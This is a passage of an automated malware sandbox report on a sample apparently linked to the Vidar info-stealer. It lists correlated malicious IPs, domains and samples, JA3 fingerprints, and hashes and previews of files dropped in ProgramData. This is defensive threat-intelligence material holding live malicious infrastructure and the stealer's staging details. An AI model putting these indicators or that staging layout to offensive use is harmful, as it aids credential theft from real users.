                                                                                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                                                                                Warnings

                                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 172.217.19.227, 173.194.220.84, 172.217.19.238, 172.217.17.46, 217.20.58.100, 172.217.21.35, 13.107.42.16, 204.79.197.203, 13.107.21.239, 204.79.197.239, 13.107.6.158, 13.87.96.169, 2.19.198.56, 23.32.238.138, 2.16.158.50, 2.16.158.90, 2.16.158.75, 2.16.158.169, 2.16.158.83, 2.16.158.82, 2.16.158.80, 2.16.158.73, 2.16.158.74, 2.16.168.113, 2.16.168.122, 2.16.158.35, 2.16.158.27, 2.16.158.176, 2.16.158.170, 2.16.158.185, 2.16.158.34, 2.16.158.26, 2.16.158.186, 2.16.158.171, 95.100.135.177, 95.100.135.185, 95.100.135.187, 95.100.135.195, 95.100.135.202, 95.100.135.192, 95.100.135.201, 95.100.135.176, 95.100.135.178, 142.251.40.99, 142.250.80.67, 142.251.40.195, 142.250.80.99, 13.107.246.63, 4.245.163.56, 23.218.208.109, 94.245.104.56, 20.190.177.20, 23.200.0.6, 104.40.82.182, 13.107.246.40, 204.79.197.237, 104.117.182.59, 20.96.153.111
                                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, data-edge.smartscreen.microsoft.com, img-s-msn-com.akamaized.net, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, clients2.google.com, e86303.dscx.akamaiedge.net, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, e28578.d.akamaiedge.net, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, bingadsedgeextension-prod.trafficmanager.net, prod-atm-wds-edge.trafficmanager.net, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients.l.google.com, config.edge.skype.com.trafficmanager.net, time.windows.com, arc.msn.com, redirector.gvt1.com, www.bing.com.edgekey.net, th.bing.com, config.edge.skype.com, edge-microsoft-com.dual-a-0036.a-msedge.net, accounts.google.com, prod-agic-us-1.uksouth.cloudapp.azure.com, bzib.nelreports.n
                                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                                                                Simulations

                                                                                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                                                                                01:09:12API Interceptor1x Sleep call for process: din.exe modified

                                                                                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                                                                                IPs

                                                                                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                149.154.167.99http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/img/favicon.ico
                                                                                                                                                                                                                                                http://cryptorabotakzz.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://cache.netflix.com.id1.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/dl?tme=fe3233c08ff79d4814_5062105595184761217
                                                                                                                                                                                                                                                http://investors.spotify.com.sg2.wuush.us.kg/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://bekaaviator.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://telegramtw1.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/?setln=pl
                                                                                                                                                                                                                                                http://makkko.kz/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.org/
                                                                                                                                                                                                                                                http://telegram.dogGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • telegram.dog/
                                                                                                                                                                                                                                                LnSNtO8JIa.exeGet hashmaliciousCinoshi StealerBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot
                                                                                                                                                                                                                                                jtfCFDmLdX.exeGet hashmaliciousGurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRATBrowse
                                                                                                                                                                                                                                                • t.me/cinoshibot
                                                                                                                                                                                                                                                18.238.49.74file.exeGet hashmaliciousAmadey, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                          https://www.canva.com/design/DAGEBBzq9KM/jvjE01qRbaOyWhWyDOHDeg/view?utm_content=DAGEBBzq9KM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                            http://www.vendella.co.nzGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                              https://aolserv.pages.dev/robots.txtIP:Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                https://www.canva.com/design/DAF6EQJ4C4g/RbN6H2_tIuSyQea_uekL9g/view?utm_content=DAF6EQJ4C4g&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  t.melem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  bijutr.shoplem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  chrome.cloudflare-dns.comlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  WRD1792.docx.docGet hashmaliciousDynamerBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  https://jkqbjwq.maxiite.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  SalmonSamurai.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  https://liladelman.com/rental/1218-west-side-road-block-island/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 162.159.61.3
                                                                                                                                                                                                                                                                  Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                                                                                                  ssl.bingadsedgeextension-prod-europe.azurewebsites.netlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  nTyPEbq9wQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  ktyihkdfesf.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56
                                                                                                                                                                                                                                                                  pjthjsdjgjrtavv.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 94.245.104.56

                                                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  TELEGRAMRUlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  INQUIRY.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.220
                                                                                                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUSlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                                                                                  phish_alert_iocp_v1.4.48 - 2024-12-26T095152.060.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 52.109.68.129
                                                                                                                                                                                                                                                                  phish_alert_iocp_v1.4.48 - 2024-12-26T092852.527.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 20.42.73.24
                                                                                                                                                                                                                                                                  HVlonDQpuI.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 204.79.197.219
                                                                                                                                                                                                                                                                  Google Authenticator You're trying to sign in from a new location.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 52.109.28.46
                                                                                                                                                                                                                                                                  xd.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 20.16.86.154
                                                                                                                                                                                                                                                                  xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 40.92.218.88
                                                                                                                                                                                                                                                                  xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 104.209.1.224
                                                                                                                                                                                                                                                                  xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 20.238.93.245
                                                                                                                                                                                                                                                                  xd.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 13.105.88.193
                                                                                                                                                                                                                                                                  AMAZON-02USdb0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                                                                                                                  • 54.126.82.77
                                                                                                                                                                                                                                                                  RpcSecurity.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 54.217.10.153
                                                                                                                                                                                                                                                                  RpcSecurity.x86_64.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 34.243.160.129
                                                                                                                                                                                                                                                                  feiwbps.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                  most-mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                  http://kxyaiaqyijjz.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 13.227.8.126
                                                                                                                                                                                                                                                                  boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                  .i.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 54.171.230.55
                                                                                                                                                                                                                                                                  ub8ehJSePAfc9FYqZIT6.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                  • 34.249.145.219
                                                                                                                                                                                                                                                                  http://auth-owlting.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 3.114.85.154

                                                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  markiz.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  utkin.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  libcurl.dllGet hashmaliciousMatanbuchusBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  b8ygJBG5cb.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205
                                                                                                                                                                                                                                                                  setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                  • 149.154.167.99
                                                                                                                                                                                                                                                                  • 188.245.216.205

                                                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                                  C:\ProgramData\NGVAAIE3W4EU\5F3EKFlem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    script.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                        nB52P46OJD.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                          lem.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                            Setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                              xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                                fim3BhyKXP.gifGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                  TMX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, VidarBrowse

                                                                                                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\1NYU3O

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):889
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.016955029110262
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZR+Vj3Xg0cjAkt3QbENgwnwJXMFhUK:22e8v+VrgfAbIggwJuX
                                                                                                                                                                                                                                                                                      MD5:2948FF1C0804EC7DB473BB77EB3FBE4E
                                                                                                                                                                                                                                                                                      SHA1:98A97AFC0E4E2B09A17AA0746F455DFD24356357
                                                                                                                                                                                                                                                                                      SHA-256:2F6B99F5915A462CAFF60950839E1498F12C9F8194DB3DA02251C5BD2CAD700E
                                                                                                                                                                                                                                                                                      SHA-512:8393B3AE7D44A4DD85D05D48768F9123910E603C477A3CACC6BF12D03D464959EC01A293B0B3317B0F8470A76D71F695098AE211DD6200D8F7F21E1C757F4EDA
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Security-NGC-PopKeySrv".. processorArchitecture="*".. version="0.0.0.0".. />.. <migration.. offlineApply="no".. scope="Upgrade,Data".. settingsVersion="3".. replacementSettingsVersionRange="0-2" .. >.. <migXml xmlns="">.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Control\Cryptography\Ngc\* [*]</pattern>.. </objectSet>.. </include>.. </rules>.. </migXml>.. </migration>..</assembly>..

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\3OHLNY

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.265142166671222
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMXSAELyKOMq+8HKkjucswRv8p3nVum1:K0q+n0JX9ELyKOMq+8HKkjuczRv895
                                                                                                                                                                                                                                                                                      MD5:7749D35D26380A5605EBD39948BD12CA
                                                                                                                                                                                                                                                                                      SHA1:A694839C1E844DE9DEA58022064A3DFA2FF6B8D5
                                                                                                                                                                                                                                                                                      SHA-256:EFF6E373B3FD123F4B0A64862FF00B0181C7220DD7EC7B635ABF15065902B075
                                                                                                                                                                                                                                                                                      SHA-512:557F7EAF39F3F75FDD2B513C32BEECCFF2856FB82830B8D7A73D40FD269041A7D545294D3762081B85FDFC4754187D3936679FC20DA68506FABF6E4DD49639D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\5F3EKF

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):24008
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.062446965815151
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:GKODczWz9IdqYbN9h+rKipXKuS28xb3HWJvah46Flkzl2W4FWEWSawTyihVWQ4e1:6DiWzGG+mKlxb32JyczEW4FWdwGyUlI
                                                                                                                                                                                                                                                                                      MD5:6AEAEBF650EFC93CD3B6670A05724FE8
                                                                                                                                                                                                                                                                                      SHA1:A4FE07E6C678AC8D4DC095997DB5043668D103B4
                                                                                                                                                                                                                                                                                      SHA-256:C86891B9DF9FEEA2E98F50C9950CB446DB97A513AF0C23810F7CA818A6187329
                                                                                                                                                                                                                                                                                      SHA-512:5C7E8C7DBAEB22956C774199BAD83312987240D574160B846349C0E237445407FF1CAACD2984BFAD0BBBE6011CC8918AF60A0EBBE82A8561CAFA4DF825ADD183
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                                                                                                                      • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: script.ps1, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: xoJxSAotVM.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: fim3BhyKXP.gif, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: TMX.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q..Q..Q..E...S..E...]..Q..t..E...Z..E...P..E...S..E.S.P..E...P..RichQ..................PE..d....Q.!..........",.........$......................................................Bn....`A.........................................<..X....<..x....p..(....`..h....<...!......(....8..T............................0..............(1..0............................text...p........................... ..`.rdata..>....0......................@..@.data...`....P.......0..............@....pdata..h....`.......2..............@..@.rsrc...(....p.......4..............@..@.reloc..(............:..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\6XLX4O

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1095
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.976174799333973
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:p/o2e8ZR+UX6g0cj3+3A63sDEF4wwVpQwuoMBX0FCUK:22e8v+DgfLUwY4fcZB2A
                                                                                                                                                                                                                                                                                      MD5:ECC51190BD585AB376691BBDDF2A638B
                                                                                                                                                                                                                                                                                      SHA1:84DE01CF25B71C0BC4D16FAF65BE1589E385EAF0
                                                                                                                                                                                                                                                                                      SHA-256:6F15C7E90A3C414BEAD4C1C50DC5E7CAB987D72E2F49953B717A879D7745038C
                                                                                                                                                                                                                                                                                      SHA-512:C0626F92BD934A3C5295EA32D63910C3F51E0A47CB6287C698C0DF7EE66C1D1A1867FDE10F824BD7514566C69CD2DA16571D3F0DC56FE9DE39D13F89DFE2A02A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.<?xml version='1.0' encoding='utf-8' standalone='yes'?>..<assembly.. xmlns="urn:schemas-microsoft-com:asm.v3".. xmlns:xsd="http://www.w3.org/2001/XMLSchema".. xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance".. manifestVersion="1.0".. >.. <assemblyIdentity.. language="neutral".. name="Microsoft-Windows-Embedded-KeyboardFilterService-Client".. processorArchitecture="*".. version="0.0.0.0".. versionScope="nonSxS".. />.. <migration.. replacementSettingsVersionRange="0-1".. settingsVersion="2".. >.. <machineSpecific>.. <migXml xmlns="">.. Per-machine state -->.. <rules context="System">.. <include>.. <objectSet>.. <pattern type="Registry">HKLM\SOFTWARE\Microsoft\Windows Embedded\KeyboardFilter\* [*]</pattern>.. <pattern type="Registry">HKLM\SYSTEM\CurrentControlSet\Services\MsKeyboardFilter [Start]</pattern>.. </objectSet>.. </inc

                                                                                                                                                                                                                                                                                      C:\ProgramData\NGVAAIE3W4EU\890R9H

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
